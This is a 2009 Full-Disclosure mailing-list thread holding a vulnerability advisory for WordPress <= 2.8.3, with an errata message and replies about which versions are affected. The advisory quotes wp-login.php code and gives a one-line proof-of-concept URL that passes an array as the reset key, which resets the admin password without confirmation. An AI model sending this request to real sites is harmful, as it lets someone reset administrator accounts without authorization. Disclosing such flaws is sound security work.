Hi there, This wasn't tested on the 2.7* branch. It as been tested on the 2.8.* branch, with php 5.3.0 & php 5.2.9 as an Apache 2.2.12 module, on a linux env.
Regards Laurent Gaffié 2009/8/10 Nicolas Valcárcel Scerpella <[email protected]> > I don't see the issue with wp 2.7.1 > > On Mon, 10 Aug 2009, laurent gaffie wrote: > > > Errata: > > > > "V. BUSINESS IMPACT > > ------------------------- > > An attacker could exploit this vulnerability to compromise the admin > account > > of any wordpress/wordpress-mu <= 2.8.3" > > > > --> > > > > "V. BUSINESS IMPACT > > ------------------------- > > An attacker could exploit this vulnerability to reset the admin account > of > > any wordpress/wordpress-mu <= 2.8.3" > > > > > > Regards Laurent Gaffié > > > > > > 2009/8/10 laurent gaffie <[email protected]> > > > > > ============================================= > > > - Release date: August 10th, 2009 > > > - Discovered by: Laurent Gaffié > > > - Severity: Medium > > > ============================================= > > > > > > I. VULNERABILITY > > > ------------------------- > > > WordPress <= 2.8.3 Remote admin reset password > > > > > > II. BACKGROUND > > > ------------------------- > > > WordPress is a state-of-the-art publishing platform with a focus on > > > aesthetics, web standards, and usability. > > > WordPress is both free and priceless at the same time. > > > More simply, WordPress is what you use when you want to work with your > > > blogging software, not fight it. > > > > > > III. DESCRIPTION > > > ------------------------- > > > The way Wordpress handle a password reset looks like this: > > > You submit your email adress or username via this form > > > /wp-login.php?action=lostpassword ; > > > Wordpress send you a reset confirmation like that via email: > > > > > > " > > > Someone has asked to reset the password for the following site and > > > username. > > > http://DOMAIN_NAME.TLD/wordpress > > > Username: admin > > > To reset your password visit the following address, otherwise just > ignore > > > this email and nothing will happen > > > > > > > > > > http://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag > > > " > > > > > > You click on the link, and then Wordpress reset your admin password, > and > > > sends you over another email with your new credentials. > > > > > > Let's see how it works: > > > > > > > > > wp-login.php: > > > ...[snip].... > > > line 186: > > > function reset_password($key) { > > > global $wpdb; > > > > > > $key = preg_replace('/[^a-z0-9]/i', '', $key); > > > > > > if ( empty( $key ) ) > > > return new WP_Error('invalid_key', __('Invalid key')); > > > > > > $user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users > WHERE > > > user_activation_key = %s", $key)); > > > if ( empty( $user ) ) > > > return new WP_Error('invalid_key', __('Invalid key')); > > > ...[snip].... > > > line 276: > > > $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login'; > > > $errors = new WP_Error(); > > > > > > if ( isset($_GET['key']) ) > > > $action = 'resetpass'; > > > > > > // validate action so as to default to the login screen > > > if ( !in_array($action, array('logout', 'lostpassword', > 'retrievepassword', > > > 'resetpass', 'rp', 'register', 'login')) && false === > > > has_filter('login_form_' . $action) ) > > > $action = 'login'; > > > ...[snip].... > > > > > > line 370: > > > > > > break; > > > > > > case 'resetpass' : > > > case 'rp' : > > > $errors = reset_password($_GET['key']); > > > > > > if ( ! is_wp_error($errors) ) { > > > wp_redirect('wp-login.php?checkemail=newpass'); > > > exit(); > > > } > > > > > > wp_redirect('wp-login.php?action=lostpassword&error=invalidkey'); > > > exit(); > > > > > > break; > > > ...[snip ]... > > > > > > You can abuse the password reset function, and bypass the first step > and > > > then reset the admin password by submiting an array to the $key > variable. > > > > > > > > > IV. PROOF OF CONCEPT > > > ------------------------- > > > A web browser is sufficiant to reproduce this Proof of concept: > > > http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=<http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key%5B%5D=> > <http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key%5B%5D=> > > > The password will be reset without any confirmation. > > > > > > V. BUSINESS IMPACT > > > ------------------------- > > > An attacker could exploit this vulnerability to compromise the admin > > > account of any wordpress/wordpress-mu <= 2.8.3 > > > > > > VI. SYSTEMS AFFECTED > > > ------------------------- > > > All > > > > > > VII. SOLUTION > > > ------------------------- > > > No patch aviable for the moment. > > > > > > VIII. REFERENCES > > > ------------------------- > > > http://www.wordpress.org > > > > > > IX. CREDITS > > > ------------------------- > > > This vulnerability has been discovered by Laurent Gaffié > > > Laurent.gaffie{remove-this}(at)gmail.com > > > I'd like to shoot some greetz to securityreason.com for them great > > > research on PHP, as for this under-estimated vulnerability discovered > by > > > Maksymilian Arciemowicz : > > > http://securityreason.com/achievement_securityalert/38 > > > > > > X. REVISION HISTORY > > > ------------------------- > > > August 10th, 2009: Initial release > > > > > > XI. LEGAL NOTICES > > > ------------------------- > > > The information contained within this advisory is supplied "as-is" > > > with no warranties or guarantees of fitness of use or otherwise. > > > I accept no responsibility for any damage caused by the use or > > > misuse of this information. > > > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > -- > Nicolas Valcárcel > Security Engineer > Custom Engineering Solutions Group > Canonical OEM Services > Mobile: +511 994 293 200 > Key fingerprint = 5C4D 0C85 D9C0 98FE 11F9 DD12 524E C3CD EF58 4970 > gpg --keyserver keyserver.ubuntu.com --recv-keys 654597FE > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.9 (GNU/Linux) > > iQEcBAEBCAAGBQJKgNe5AAoJEFJOw83vWElwLj4H/3dk7RW9WJoUpzI6E5QKdXsF > 7uNeGL8Yho9RZuPEK93IecImLa25Jy7KhzL+P4FfCCyYXVG8hxaUlUQss77PhsjK > VG/YkDChiNJi2tj7jixcdpVy7MLiDxMiHBGNSzI2piBiZb3/toSBvZslSW2yqgIk > OkqbJ7AE5yTu4sulhO29DRYzFUjvZHGKR2akRu/3RlOUHhwVDJw0m2ZO4M3MHz4+ > 1x/w7HhzmbMo/kioxJpPsU7f+axVnRMia9dZmvakfhmNdht98qAE/a7UlpT+ft1w > Vua7DRYwOn4o5UYXhBmUL/uCUt3CLeT9Jgu0/bWZ3G3gR1Rw1edS7E5Q7A9wlEY= > =UdOl > -----END PGP SIGNATURE----- > >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
